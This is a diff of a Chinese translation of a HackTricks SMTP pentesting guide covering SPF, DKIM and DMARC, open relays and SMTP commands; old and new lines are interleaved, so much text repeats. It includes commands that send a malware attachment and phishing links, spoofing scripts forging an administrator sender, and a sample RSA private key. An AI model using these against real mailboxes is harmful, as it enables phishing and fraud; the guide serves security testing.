**漏洞评估和渗透测试的即时可用设置**。从任何地方运行完整的渗透测试,使用 20 多种工具和功能,从侦察到报告。我们不取代渗透测试人员 - 我们开发定制工具、检测和利用模块,为他们节省时间深入挖掘、弹出 shell 并享受乐趣。
**即时可用的漏洞评估和渗透测试设置**。从任何地方运行完整的渗透测试,使用20多个工具和功能从侦察到报告。我们不替代渗透测试人员 - 我们开发自定义工具、检测和利用模块以便让他们有更多时间深入挖掘、获取shell并享受乐趣。
{% embed url="https://pentest-tools.com/" %}
## DSN 报告
## DSN报告
**传递状态通知报告**:如果您向组织发送一封电子邮件到一个**无效地址**,组织将通知该地址无效,并向您发送一封**邮件回复**。返回的电子邮件的**标头**将**包含**可能的**敏感信息**(如与报告交互的邮件服务的 IP 地址或反病毒软件信息)。
**投递状态通知报告**:如果您向一个组织发送电子邮件到一个**无效地址**,该组织会通知您该地址无效,并**回复您一封邮件**。**返回邮件的头部**将**包含**可能的**敏感信息**如与报告交互的邮件服务的IP地址或防病毒软件信息)。
## [命令](smtp-commands.md)
### 从 Linux 控制台发送电子邮件
### 从Linux控制台发送电子邮件
```bash
sendEmail -t to@domain.com -f from@attacker.com -s <ip smtp> -u "Important subject" -a /tmp/malware.pdf
Reading message body from STDIN because the '-m' option was not used.
@ -198,11 +193,11 @@ If you are manually typing in a message:
```bash
swaks --to $(cat emails | tr '\n' ',' | less) --from test@sneakymailer.htb --header "Subject: test" --body "please click here http://10.10.14.42/" --server 10.10.10.197
```
### 使用Python发送电子邮件
### 使用 Python 发送电子邮件
<details>
<summary>Python代码如下</summary>
<summary>这里是 Python 代码</summary>
```python
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
@ -247,58 +242,58 @@ print("[***]successfully sent email to %s:" % (msg['To']))
```
</details>
## SMTP走私
## SMTP Smuggling
SMTP走私漏洞允许绕过所有SMTP保护措施查看下一节以获取有关保护措施的更多信息。有关SMTP走私的更多信息,请查看:
SMTP Smuggling 漏洞允许绕过所有 SMTP 保护(有关保护的更多信息,请查看下一节)。有关 SMTP Smuggling 的更多信息,请查看:
{% content-ref url="smtp-smuggling.md" %}
[smtp-smuggling.md](smtp-smuggling.md)
{% endcontent-ref %}
## 电子邮件欺骗对策
## 邮件伪造对策
通过使用**SPF**、**DKIM**和**DMARC**组织可以防止未经授权的电子邮件代表其发送因为SMTP消息很容易被伪造
由于伪造 SMTP 消息的容易性,组织通过采用 **SPF**、**DKIM** 和 **DMARC** 来防止未经授权的电子邮件代表他们发送
可在[https://seanthegeek.net/459/demystifying-dmarc/](https://seanthegeek.net/459/demystifying-dmarc/)找到**这些对策的完整指南**
有关这些对策的 **完整指南** 可在 [https://seanthegeek.net/459/demystifying-dmarc/](https://seanthegeek.net/459/demystifying-dmarc/) 获取
### SPF
{% hint style="danger" %}
SPF [2014年被"弃用"](https://aws.amazon.com/premiumsupport/knowledge-center/route53-spf-record/)。这意味着,不再在`_spf.domain.com`中创建**TXT记录**,而是在`domain.com`中使用**相同的语法**创建记录。\
此外为了重用以前的SPF记录通常会发现类似`"v=spf1 include:_spf.google.com ~all"`的内容。
SPF [ 2014 年被“弃用”](https://aws.amazon.com/premiumsupport/knowledge-center/route53-spf-record/)。这意味着您应该在 `domain.com` 中创建 **TXT 记录**,而不是在 `_spf.domain.com` 中创建,使用 **相同的语法**。\
此外,为了重用以前的 SPF 记录,通常会发现类似`"v=spf1 include:_spf.google.com ~all"` 的内容。
{% endhint %}
**发件人策略框架**SPF是一种机制使邮件传输代理MTA能够通过查询组织定义的授权邮件服务器列表来验证发送电子邮件的主机是否经过授权。这个列表包括在SPF记录中的各种“**机制**”指定了IP地址/范围、域和其他实体,这些实体被授权代表域名发送电子邮件
**发送方策略框架**SPF是一种机制使邮件传输代理MTA能够通过查询组织定义的授权邮件服务器列表来验证发送电子邮件的主机是否被授权。该列表指定了 **被授权代表域名发送电子邮件的 IP 地址/范围、域名和其他实体**,包括 SPF 记录中的各种“**机制**”
#### 机制
来自[Wikipedia](https://en.wikipedia.org/wiki/Sender\_Policy\_Framework)
来自 [维基百科](https://en.wikipedia.org/wiki/Sender\_Policy\_Framework)
| 机制 | 描述 |
| --------- | --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| ALL | 始终匹配;用于默认结果,例如对于所有未被先前机制匹配的IP使用`-all`。 |
| A | 如果域名具有可以解析为发件人地址的地址记录A或AAAA,则匹配。 |
| IP4 | 如果发件人在给定的IPv4地址范围内则匹配。 |
| IP6 | 如果发件人在给定的IPv6地址范围内则匹配。 |
| MX | 如果域名具有解析为发件人地址的MX记录它将匹配即邮件来自域的传入邮件服务器之一)。 |
| PTR | 如果客户端地址的域名PTR记录在给定域中并且该域名解析为客户端地址前向确认反向DNS则匹配。如果可能应避免使用此机制。 |
| EXISTS | 如果给定的域名解析为任何地址,则匹配(无论解析为何种地址。这种情况很少见。与SPF宏语言一起它提供了更复杂的匹配如DNSBL查询。 |
| INCLUDE | 引用另一个域的策略。如果该域的策略通过,此机制通过。但是,如果包含的策略失败,处理将继续。要完全委托给另一个域的策略,必须使用重定向扩展。 |
| REDIRECT | <p>重定向是指向托管SPF策略的另一个域名的指针它允许多个域共享相同的SPF策略。在处理共享相同电子邮件基础设施的大量域时这是很有用的</p><p>将使用重定向机制中指示的域的SPF策略。</p> |
| 机制 | 描述 |
| --------- | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| ALL | 始终匹配;用于默认结果,`-all`,适用于未被先前机制匹配的所有 IP。 |
| A | 如果域名有一个地址记录A 或 AAAA且可以解析为发送者的地址,则匹配。 |
| IP4 | 如果发送者在给定的 IPv4 地址范围内,则匹配。 |
| IP6 | 如果发送者在给定的 IPv6 地址范围内,则匹配。 |
| MX | 如果域名有一个 MX 记录解析为发送者的地址,则匹配(即邮件来自该域的一个入站邮件服务器)。 |
| PTR | 如果客户端地址的域名PTR 记录)在给定域中,并且该域名解析为客户端地址(前向确认的反向 DNS则匹配。此机制不推荐使用尽可能避免。 |
| EXISTS | 如果给定的域名解析为任何地址,则匹配(无论解析为哪个地址)。这很少使用。与 SPF 宏语言一起,它提供了更复杂的匹配,如 DNSBL 查询。 |
| INCLUDE | 引用另一个域的策略。如果该域的策略通过,则此机制通过。然而,如果包含的策略失败,则继续处理。要完全委托给另一个域的策略,必须使用重定向扩展。 |
| REDIRECT | <p>重定向是指向另一个域名的指针,该域名托管 SPF 策略,它允许多个域共享相同的 SPF 策略。当处理大量共享相同电子邮件基础设施的域时,它非常有用</p><p>将使用重定向机制中指示的域的 SPF 策略。</p> |
还可以识别**限定符**,指示**如果匹配了机制应执行什么操作**。默认情况下,使用**限定符“+”**(因此,如果匹配了任何机制,表示允许)。\
通常,您会在**每个SPF策略的末尾**看到类似**\~all**或**-all**的内容。这用于指示**如果发件人不符合任何SPF策略则应将电子邮件标记为不受信任\~)或拒绝(-)电子邮件。**
还可以识别 **限定符**,指示 **如果匹配了某个机制应该采取什么措施**。默认情况下,使用 **限定符 "+"**(因此如果匹配了任何机制,则表示允许)。\
您通常会注意到 **每个 SPF 策略的末尾** 有类似于:**\~all** 或 **-all** 的内容。这用于指示 **如果发送者不匹配任何 SPF 策略,则应将电子邮件标记为不可信\~)或拒绝(-)电子邮件。**
#### 限定符
策略中的每个机制都可以以四个限定符之一作为前缀,以定义预期结果:
策略中的每个机制可以由四个限定符之一前缀,以定义预期结果:
* **`+`**:对应于通过结果。默认情况下,机制假定此限定符,使`+mx`等同于`mx`。
* **`+`**:对应于通过结果。默认情况下,机制假定此限定符,使`+mx` 等同于 `mx`
* **`?`**:表示中立结果,类似于无(没有特定策略)。
* **`~`**:表示SOFTFAIL作为中立和FAIL之间的中间地带。通常接受符合此结果的电子邮件,但会相应标记。
* **`-`**:表示FAIL建议直接拒绝该电子邮件
* **`~`**:表示软失败,作为中立和失败之间的中间状态。符合此结果的电子邮件通常被接受,但会相应标记。
* **`-`**:表示失败,建议电子邮件应被直接拒绝
接下来的示例中,展示了**google.com的SPF策略**。请注意在第一个SPF策略中包含了来自不同域的SPF策略:
即将到来的示例中,**google.com 的 SPF 策略** 被说明。请注意在第一个 SPF 策略中包含来自不同域的 SPF 策略:
```shell-session
dig txt google.com | grep spf
google.com. 235 IN TXT "v=spf1 include:_spf.google.com ~all"
@ -317,15 +312,15 @@ _netblocks2.google.com. 1908 IN TXT "v=spf1 ip6:2001:4860:4000::/36
dig txt _netblocks3.google.com | grep spf
_netblocks3.google.com. 1903 IN TXT "v=spf1 ip4:172.217.0.0/19 ip4:172.217.32.0/20 ip4:172.217.128.0/19 ip4:172.217.160.0/20 ip4:172.217.192.0/19 ip4:172.253.56.0/21 ip4:172.253.112.0/20 ip4:108.177.96.0/19 ip4:35.191.0.0/16 ip4:130.211.0.0/22 ~all"
```
传统上,可以伪造任何没有正确/任何 SPF 记录的域名。**如今**,如果**电子邮件**来自**没有有效 SPF 记录的域**,可能会被**自动拒收/标记为不受信任**。
传统上,可以伪造任何没有正确/任何 SPF 记录的域名。**如今**,如果**电子邮件**来自**没有有效 SPF 记录的域名**,则可能会**自动被拒绝/标记为不可信**。
要检查域的 SPF可以使用在线工具[https://www.kitterman.com/spf/validate.html](https://www.kitterman.com/spf/validate.html)
要检查域的 SPF可以使用在线工具,如:[https://www.kitterman.com/spf/validate.html](https://www.kitterman.com/spf/validate.html)
### DKIMDomainKeys Identified Mail
### DKIM (DomainKeys Identified Mail)
DKIM 用于签署出站电子邮件允许外部邮件传输代理MTA通过从 DNS 检索域的公钥来验证它们。这个公钥位于域的 TXT 记录中。要访问此密钥,必须知道选择器和域名。
DKIM 用于签署外发电子邮件,允许外部邮件传输代理 (MTA) 通过从 DNS 检索域的公钥来验证它们。此公钥位于域的 TXT 记录中。要访问此密钥,必须知道选择器和域名。
例如,要请求密钥,域名和选择器是必不可少的。这些可以在邮件头 `DKIM-Signature` 中找到,例如,`d=gmail.com;s=20120113`
例如,要请求密钥,域名和选择器是必需的。这些可以在邮件头 `DKIM-Signature` 中找到,例如 `d=gmail.com;s=20120113`
获取此信息的命令可能如下所示:
```bash
@ -333,11 +328,11 @@ dig 20120113._domainkey.gmail.com TXT | grep p=
# This command would return something like:
20120113._domainkey.gmail.com. 280 IN TXT "k=rsa\; p=MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA1Kd87/UeJjenpabgbFwh+eBCsSTrqmwIYYvywlbhbqoo2DymndFkbjOVIPIldNs/m40KF+yzMn1skyoxcTUGCQs8g3
```
### DMARC(基于域的消息认证、报告和合规性)
### DMARC (基于域的消息认证、报告和一致性)
DMARC通过构建在SPF和DKIM协议之上增强了电子邮件安全性。它概述了指导邮件服务器处理特定域中的电子邮件的策略包括如何处理认证失败以及将报告发送到何处以报告有关电子邮件处理操作的信息
DMARC 通过建立在 SPF 和 DKIM 协议之上来增强电子邮件安全性。它概述了指导邮件服务器处理来自特定域的电子邮件的政策,包括如何处理身份验证失败以及将关于电子邮件处理操作的报告发送到哪里
**要获取DMARC记录您需要查询子域 \_dmarc**
**要获取 DMARC 记录,您需要查询子域 \_dmarc**
```bash
# Reject
dig _dmarc.facebook.com txt | grep DMARC
@ -351,44 +346,44 @@ _dmarc.google.com. 300 IN TXT "v=DMARC1; p=quarantine; rua=mailto:mailauth-repor
dig _dmarc.bing.com txt | grep DMARC
_dmarc.bing.com. 3600 IN TXT "v=DMARC1; p=none; pct=100; rua=mailto:BingEmailDMARC@microsoft.com;"
```
#### DMARC标签
#### DMARC 标签
| 标签名称 | 目的 | 示例 |
| -------- | --------------------------------------------- | ------------------------------- |
| v | 协议版本 | v=DMARC1 |
| pct | 经过过滤的消息百分比 | pct=20 |
| ruf | 用于取证报告的报告URI | ruf=mailto:authfail@example.com |
| rua | 聚合报告的报告URI | rua=mailto:aggrep@example.com |
| p | 组织域的策略 | p=quarantine |
| sp | OD子域的策略 | sp=reject |
| adkim | DKIM的对齐模式 | adkim=s |
| aspf | SPF的对齐模式 | aspf=r |
| 标签名称 | 目的 | 示例 |
| -------- | -------------------------------------------- | -------------------------------- |
| v | 协议版本 | v=DMARC1 |
| pct | 受过滤消息的百分比 | pct=20 |
| ruf | 法医报告的报告 URI | ruf=mailto:authfail@example.com |
| rua | 汇总报告的报告 URI | rua=mailto:aggrep@example.com |
| p | 组织域的政策 | p=quarantine |
| sp | 组织域的子域政策 | sp=reject |
| adkim | DKIM 的对齐模式 | adkim=s |
| aspf | SPF 的对齐模式 | aspf=r |
### **子域名呢**
### **子域怎么办**
**** [**这里**](https://serverfault.com/questions/322949/do-spf-records-for-primary-domain-apply-to-subdomains)****\
您需要为希望从中发送邮件的每个子域名设置单独的SPF记录。\
以下内容最初发布在openspf.org上这曾经是这类事情的一个很好的资源。
**来自** [**这里**](https://serverfault.com/questions/322949/do-spf-records-for-primary-domain-apply-to-subdomains)**.**\
您需要为每个希望发送邮件的子域拥有单独的 SPF 记录。\
以下内容最初发布在 openspf.org 上,该网站曾是此类信息的极好资源。
> 魔鬼问题:子域名呢
> 恶魔问题:子域怎么办
>
> 如果我从pielovers.demon.co.uk收到邮件并且pielovers没有SPF数据我应该返回一级并测试demon.co.uk的SPF吗不。Demon的每个子域名都是不同的客户,每个客户可能有自己的策。Demon的策默认适用于所有客户是没有意义的如果Demon想这样做,可以为每个子域设置SPF记录。
> 如果我从 pielovers.demon.co.uk 收到邮件,而 pielovers 没有 SPF 数据,我应该回到上一级并测试 demon.co.uk 的 SPF 吗不应该。Demon 的每个子域都是不同的客户,每个客户可能有自己的策。Demon 策默认适用于所有客户是没有意义的;如果 Demon 想这样做,可以为每个子域设置 SPF 记录。
>
> 因此,对于SPF发布者的建议是您应该为具有A或MX记录的每个子域名或主机名添加一个SPF记录。
> 因此,给 SPF 发布者的建议是:您应该为每个具有 A 或 MX 记录的子域或主机名添加 SPF 记录。
>
> 具有通配符A或MX记录的站点还应具有通配符SPF记录式为:\* IN TXT "v=spf1 -all"
> 具有通配符 A 或 MX 记录的网站也应该具有通配符 SPF 记录,形式为:\* IN TXT "v=spf1 -all"
是有道理的 - 子域名很可能位于不同的地理位置并且具有非常不同的SPF定义。
很有道理——子域可能位于不同的地理位置,并具有非常不同的 SPF 定义。
### **开放中继**
### **开放转发**
发送电子邮件时,确保它们不被标记为垃圾邮件至关重要。这通常通过使用**收件人信任的中继服务器**来实现。然而,一个常见的挑战是管理员可能不完全了解哪些**IP范围是安全允许的**。这种缺乏理解可能导致在设置SMTP服务器时出现错误这是安全评估中经常发现的风险。
发送电子邮件时,确保它们不被标记为垃圾邮件至关重要。这通常通过使用**收件人信任的中继服务器**来实现。然而,一个常见的挑战是管理员可能不完全了解哪些**IP 范围是安全的**。这种缺乏理解可能导致在设置 SMTP 服务器时出现错误,这是安全评估中经常识别的风险。
一些管理员为了避免邮件传递问题,特别是与潜在或正在进行的客户的通信有关,会采用的一种解决方法是**允许来自任何IP地址的连接**。这是通过配置SMTP服务器的`mynetworks`参数以接受所有IP地址来实现的,如下所示:
一些管理员使用的解决方法是**允许来自任何 IP 地址的连接**,以避免电子邮件投递问题,特别是与潜在或正在进行的客户的通信。这是通过将 SMTP 服务器的 `mynetworks` 参数配置为接受所有 IP 地址来实现的,如下所示:
```bash
mynetworks = 0.0.0.0/0
```
要检查邮件服务器是否是一个开放中继(意味着它可以转发来自任何外部来源的电子邮件),通常使用`nmap`工具。它包含一个专门设计用于测试这一点的特定脚本。使用`nmap`在端口25上对服务器进行详细扫描的命令例如IP为10.10.10.10是:
为了检查邮件服务器是否是开放转发(这意味着它可以从任何外部来源转发电子邮件),通常使用 `nmap` 工具。它包括一个专门用于测试的脚本。使用 `nmap` 在端口 25 上对服务器例如IP 为 10.10.10.10)进行详细扫描的命令是:
```bash
nmap -p25 --script smtp-open-relay 10.10.10.10 -v
```
@ -397,13 +392,13 @@ nmap -p25 --script smtp-open-relay 10.10.10.10 -v
* [**https://github.com/serain/mailspoof**](https://github.com/serain/mailspoof) **检查 SPF 和 DMARC 配置错误**
* [**https://pypi.org/project/checkdmarc/**](https://pypi.org/project/checkdmarc/) **自动获取 SPF 和 DMARC 配置**
### 发送欺骗邮件
### 发送伪造邮件
* [**https://www.mailsploit.com/index**](https://www.mailsploit.com/index)
* [**http://www.anonymailer.net/**](http://www.anonymailer.net)
* [**https://emkei.cz/**](https://emkei.cz/)
**或者您可以使用工具:**
**或者你可以使用一个工具:**
* [**https://github.com/magichk/magicspoofing**](https://github.com/magichk/magicspoofing)
```bash
@ -413,8 +408,8 @@ python3 magicspoofmail.py -d victim.com -t -e destination@gmail.com
python3 magicspoofmail.py -d victim.com -t -e destination@gmail.com --subject TEST --sender administrator@victim.com
```
{% hint style="warning" %}
如果在使用 dkim python lib 解析密钥时出现任何错误,请随时使用以下密钥。\
**注意**:这只是一个快速修复方法在某些情况下由于某种原因openssl私钥**无法被 dkim 解析**,可以用此方法进行快速检查。
如果您在使用 dkim python lib 解析密钥时遇到任何 **错误**,请随意使用以下内容。\
**注意**:这只是一个临时修复,用于在某些情况下 openssl 私钥 **无法被 dkim 解析**进行快速检查。
```
-----BEGIN RSA PRIVATE KEY-----
MIICXgIBAAKBgQDdkohAIWT6mXiHpfAHF8bv2vHTDboN2dl5pZKG5ZSHCYC5Z1bt
@ -434,12 +429,12 @@ K9B7U1w0CJFUk6+4Qutr2ROqKtNOff9KuNRLAOiAzH3ZbQ==
```
{% endhint %}
**或者您可以手动操作**
**或者你可以手动完成**
{% tabs %}
{% tab title="PHP" %}
<pre class="language-php"><code class="lang-php"><strong># 这将发送一条未签名的消息
</strong><strong>mail("your_email@gmail.com", "测试主题!", "嘿!这是一个测试", "From: administrator@victim.com");
</strong><strong>mail("your_email@gmail.com", "测试主题!", "嘿!这是一个测试", "来自:administrator@victim.com");
</strong></code></pre>
{% endtab %}
@ -504,38 +499,40 @@ s.sendmail(sender, [destination], msg_data)
### **更多信息**
**在** [**https://seanthegeek.net/459/demystifying-dmarc/**](https://seanthegeek.net/459/demystifying-dmarc/) **找到关这些保护措施的更多信息**
**在** [**https://seanthegeek.net/459/demystifying-dmarc/**](https://seanthegeek.net/459/demystifying-dmarc/) **找到关这些保护的更多信息**
### **其他钓鱼指标**
* 域名的年龄
* 指向 IP 地址的链接
* 链接操技术
* 指向IP地址的链接
* 链接操技术
* 可疑(不常见)附件
* 邮件内容损坏
* 使用与邮件头不同的值
* 存在有效且受信任的 SSL 证书
* 将页面提交给 Web 内容过滤站点
* 损坏的电子邮件内容
* 使用的值与邮件头不同
* 存在有效且受信任的SSL证书
* 将页面提交给网络内容过滤网站
## 通过 SMTP 进行数据泄露
## 通过SMTP进行外泄
**如果您可以通过 SMTP 发送数据**[**阅读此内容**](../../generic-methodologies-and-resources/exfiltration.md#smtp)**。**
**如果您可以通过SMTP发送数据** [**请阅读此文**](../../generic-methodologies-and-resources/exfiltration.md#smtp)**。**
## 配置文件
### Postfix
通常,如果安装了 Postfix`/etc/postfix/master.cf` 中包含了**在用户收到新邮件时执行的脚本**。例如,`flags=Rq user=mark argv=/etc/postfix/filtering-f ${sender} -- ${recipient}` 这一行意味着如果用户 mark 收到新邮件,将执行 `/etc/postfix/filtering`
通常,如果已安装,`/etc/postfix/master.cf` 中包含 **在用户收到新邮件时执行的脚本**。例如,`flags=Rq user=mark argv=/etc/postfix/filtering-f ${sender} -- ${recipient}` 这一行意味着如果用户mark收到新邮件将执行`/etc/postfix/filtering`。
其他配置文件:
```
sendmail.cf
submit.cf
```
## 参考资料
## 参考
* [https://research.nccgroup.com/2015/06/10/username-enumeration-techniques-and-their-value/](https://research.nccgroup.com/2015/06/10/username-enumeration-techniques-and-their-value/)
* [https://www.reddit.com/r/HowToHack/comments/101it4u/what\_could\_hacker\_do\_with\_misconfigured\_smtp/](https://www.reddit.com/r/HowToHack/comments/101it4u/what\_could\_hacker\_do\_with\_misconfigured\_smtp/)
## HackTricks 自动命令
```
Protocol_Name: SMTP #Protocol Abbreviation if there is one.
Port_Number: 25,465,587 #Comma separated if there is more than one.
@ -588,20 +585,21 @@ Command: msfconsole -q -x 'use auxiliary/scanner/smtp/smtp_version; set RHOSTS {
```
<figure><img src="../../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
**立即提供漏洞评估和渗透测试设置**。从侦察到报告,使用 20 多种工具和功能运行完整的渗透测试。我们不取代渗透测试人员 - 我们开发定制工具、检测和利用模块,为他们节省时间深入挖掘、弹出 shell 并享受乐趣。
**即时可用的漏洞评估和渗透测试设置**。从任何地方运行完整的渗透测试,使用 20 多种工具和功能,从侦察到报告。我们不替代渗透测试人员 - 我们开发自定义工具、检测和利用模块,以便让他们有更多时间深入挖掘、获取 shell 并享受乐趣。
{% embed url="https://pentest-tools.com/" %}
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家)</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 PDF 版本的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 发现[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFT**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** 上关注我们**。
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** 上关注我们。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

68
network-services-pentesting/pentesting-smtp/smtp-commands.md
View file

@ -1,82 +1,84 @@
# SMTP - Commands
# SMTP - 命令
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
<figure><img src="../../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
**即时可用的漏洞评估和渗透测试设置**。从任何地方运行完整的渗透测试使用20多种工具和功能从侦察到报告。我们不取代渗透测试人员-我们开发定制工具、检测和利用模块让他们有更多时间深入挖掘、弹出shell并享受乐趣。
**即时可用的漏洞评估和渗透测试设置**。从任何地方运行完整的渗透测试,使用 20 多种工具和功能,从侦察到报告。我们不取代渗透测试人员 - 我们开发自定义工具、检测和利用模块,以便让他们有更多时间深入挖掘、获取 shell 并享受乐趣。
{% embed url="https://pentest-tools.com/" %}
**命令来** [**https://serversmtp.com/smtp-commands/**](https://serversmtp.com/smtp-commands/)
**命令来** [**https://serversmtp.com/smtp-commands/**](https://serversmtp.com/smtp-commands/)
**HELO**\
这是第一个SMTP命令它开始了标识发件服务器的对话并通常跟随其域名。
这是第一个 SMTP 命令:它开始对话,识别发送服务器,通常后面跟着其域名。
**EHLO**\
启动对话的另一种命令表明服务器正在使用扩展的SMTP协议。
一个替代命令,用于开始对话,表明服务器正在使用扩展 SMTP 协议。
**MAIL FROM**\
使用此SMTP命令开始操作发件人在“From”字段中声明源电子邮件地址,并实际开始电子邮件传输。
通过此 SMTP 命令,操作开始:发送者在“发件人”字段中声明源电子邮件地址,并实际开始电子邮件传输。
**RCPT TO**\
标识电子邮件的收件人;如果有多个收件人,命令将逐个重复地址
识别电子邮件的收件人;如果有多个,命令只是逐个地址重复
**SIZE**\
SMTP命令通知远程服务器附加电子邮件的预估大小以字节为单位。它还可用于报告服务器接受的消息的最大大小。
SMTP 命令通知远程服务器附加电子邮件的估计大小(以字节为单位)。它也可以用于报告服务器接受的最大消息大小。
**DATA**\
使用DATA命令开始传输电子邮件内容通常服务器会给出354回复代码,允许开始实际传输。
通过 DATA 命令,电子邮件内容开始传输;通常后面跟着服务器给出的 354 回复代码,允许开始实际传输。
**VRFY**\
求服务器验证特定电子邮件地址或用户名是否实际存在。
求服务器验证特定电子邮件地址或用户名是否实际存在。
**TURN**\
此命令用于在客户端和服务器之间颠倒角色,无需运行新连接。
此命令用于在客户端和服务器之间反转角色,而无需运行新的连接。
**AUTH**\
使用AUTH命令,客户端向服务器进行身份验证,提供用户名和密码。这是另一层安全性,以确保正确的传输
通过 AUTH 命令,客户端向服务器进行身份验证,提供用户名和密码。这是保证正确传输的另一层安全性。
**RSET**\
它通知服务器正在进行的电子邮件传输将被终止,尽管SMTP对话不会被关闭与QUIT的情况不同)。
它通知服务器正在进行的电子邮件传输将被终止,但 SMTP 对话不会关闭(如 QUIT 的情况)。
**EXPN**\
SMTP命令请求确认邮件列表的标识
SMTP 命令请求确认邮件列表的身份
**HELP**\
这是客户端请求有助于成功传输电子邮件的一些信息。
这是客户端请求一些可能对成功传输电子邮件有用的信息。
**QUIT**\
终止SMTP对话。
终止 SMTP 对话。
<figure><img src="../../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
**即时可用的漏洞评估和渗透测试设置**。从任何地方运行完整的渗透测试使用20多种工具和功能从侦察到报告。我们不取代渗透测试人员-我们开发定制工具、检测和利用模块让他们有更多时间深入挖掘、弹出shell并享受乐趣。
**即时可用的漏洞评估和渗透测试设置**。从任何地方运行完整的渗透测试,使用 20 多种工具和功能,从侦察到报告。我们不取代渗透测试人员 - 我们开发自定义工具、检测和利用模块,以便让他们有更多时间深入挖掘、获取 shell 并享受乐趣。
{% embed url="https://pentest-tools.com/" %}
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
